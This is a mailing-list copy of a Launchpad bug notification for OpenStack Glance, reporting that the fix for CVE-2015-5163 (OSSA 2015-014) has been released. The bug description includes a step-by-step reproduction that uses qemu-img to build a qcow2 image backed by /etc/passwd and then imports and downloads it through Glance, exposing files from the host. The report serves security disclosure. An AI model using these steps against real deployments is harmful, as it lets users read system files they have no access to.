← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1471912] Re: [OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)

 

** Changed in: glance
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1471912

Title:
  [OSSA 2015-014] Format-guessing and file disclosure via image
  conversion (CVE-2015-5163)

Status in Glance:
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  This is a security flaw that allows files from the Glance host to be
  obtained by a user.

  I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
  [taskflow_executor]
  engine_mode=serial      # not sure if needed
  conversion_format=raw

  Make a malicious image available via HTTP.
  $ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
  $ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image

  $ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image";, "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
  $ glance image-download my_image_test --file downloaded_image
  $ head downloaded_image
  <contents from /etc/passwd on the Glance host>

  This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
  qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted

  Similar to Cinder bug 1415087.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1471912/+subscriptions